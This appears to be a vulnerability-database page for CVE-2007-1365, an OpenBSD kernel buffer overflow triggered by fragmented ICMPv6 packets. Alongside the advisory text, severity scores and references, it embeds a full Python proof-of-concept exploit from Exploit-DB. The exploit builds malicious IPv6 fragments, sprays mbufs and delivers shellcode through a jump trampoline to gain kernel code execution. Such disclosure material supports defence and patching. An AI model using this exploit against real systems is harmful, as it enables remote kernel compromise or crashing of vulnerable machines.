CVE-2007-1365 : Detail

CVE-2007-1365

37.57%V3
Network
2007-03-10
20h00 +00:00
2016-10-17
11h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Buffer overflow in kern/uipc_mbuf2.c in OpenBSD 3.9 and 4.0 allows remote attackers to execute arbitrary code via fragmented IPv6 packets due to "incorrect mbuf handling for ICMP6 packets." NOTE: this was originally reported as a denial of service.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29725

Publication date : 2007-03-08 23h00 +00:00
Author : Alfredo Ortega
EDB Verified : Yes

source: https://www.securityfocus.com/bid/22901/info OpenBSD is prone to a remote buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. A remote attacker can exploit this issue to execute arbitrary code with kernel-level privileges or to crash the affected computer. Successful exploits will result in a complete compromise of vulnerable computers or cause denial-of-service conditions. # # Description: # OpenBSD ICMPv6 fragment remote execution PoC # # Author: # Alfredo Ortega # Mario Vilas # # Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc. # All rights reserved from impacket import ImpactPacket import struct import socket import time class BSD_ICMPv6_Remote_BO: MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f) def Run(self): self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) self.s.bind(('eth0',0x86dd)) sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP) validIcmp = self.buildValidICMPPacket(sourceIP,destIP) for i in range(100): # fill mbufs self.sendpacket(firstFragment) self.sendpacket(validIcmp) time.sleep(0.01) for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable self.sendpacket(secondFragment) time.sleep(0.1) self.sendpacket(firstFragment) self.sendpacket(validIcmp) time.sleep(0.1) def sendpacket(self, data): ipe = ImpactPacket.Ethernet() ipe.set_ether_dhost(self.MACADDRESS) ipd = ImpactPacket.Data(data) ipd.ethertype = 0x86dd # Ethertype for IPv6 ipe.contains(ipd) p = ipe.get_packet() self.s.send(p) def buildOpenBSDPackets(self,sourceIP,destIP): HopByHopLenght= 1 IPv6FragmentationHeader = '' IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop) IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id IPv6HopByHopHeader = '' IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP) IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D ) IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader) print longitud IPv6Packet = '' IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += '\x00' # next header (2c: Fragmentation) IPv6Packet += '\x40' # hop limit IPv6Packet += sourceIP IPv6Packet += destIP firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150) self.ShellCode = '' self.ShellCode += '\xcc' # int 3 self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret ICMPv6Packet = '' ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x00' # code ICMPv6Packet += '\xfb\x4e' # checksum ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode # Start of the next mfub (we land here): ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' # mbuf+0x20: trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp") ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' longitud = len(ICMPv6Packet) IPv6Packet = '' IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += '\x2c' # next header (2c: Fragmentation) IPv6Packet += '\x40' # hop limit IPv6Packet += sourceIP IPv6Packet += destIP IPv6FragmentationHeader = '' IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6) IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet return firstFragment, secondFragment def buildValidICMPPacket(self,sourceIP,destIP): ICMPv6Packet = '' ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x00' # code ICMPv6Packet += '\xcb\xc4' # checksum ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += 'T'*1232 longitud = len(ICMPv6Packet) IPv6Packet = '' IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += '\x3A' # next header (2c: Fragmentation) IPv6Packet += '\x40' # hop limit IPv6Packet += sourceIP IPv6Packet += destIP icmpPacket = IPv6Packet+ICMPv6Packet return icmpPacket attack = BSD_ICMPv6_Remote_BO() attack.Run()

Products Mentioned

Configuraton 0

Openbsd>>Openbsd >> Version 3.9

Openbsd>>Openbsd >> Version 4.0

References

http://www.kb.cert.org/vuls/id/986425
Tags : third-party-advisory, x_refsource_CERT-VN
http://securitytracker.com/id?1017735
Tags : vdb-entry, x_refsource_SECTRACK
http://marc.info/?l=openbsd-cvs&m=117252151023868&w=2
Tags : mailing-list, x_refsource_MLIST
http://www.osvdb.org/33050
Tags : vdb-entry, x_refsource_OSVDB
http://www.openbsd.org/errata40.html#m_dup1
Tags : vendor-advisory, x_refsource_OPENBSD
http://www.securitytracker.com/id?1017744
Tags : vdb-entry, x_refsource_SECTRACK
http://www.openbsd.org/errata39.html#m_dup1
Tags : vendor-advisory, x_refsource_OPENBSD
http://www.securityfocus.com/bid/22901
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/24490
Tags : third-party-advisory, x_refsource_SECUNIA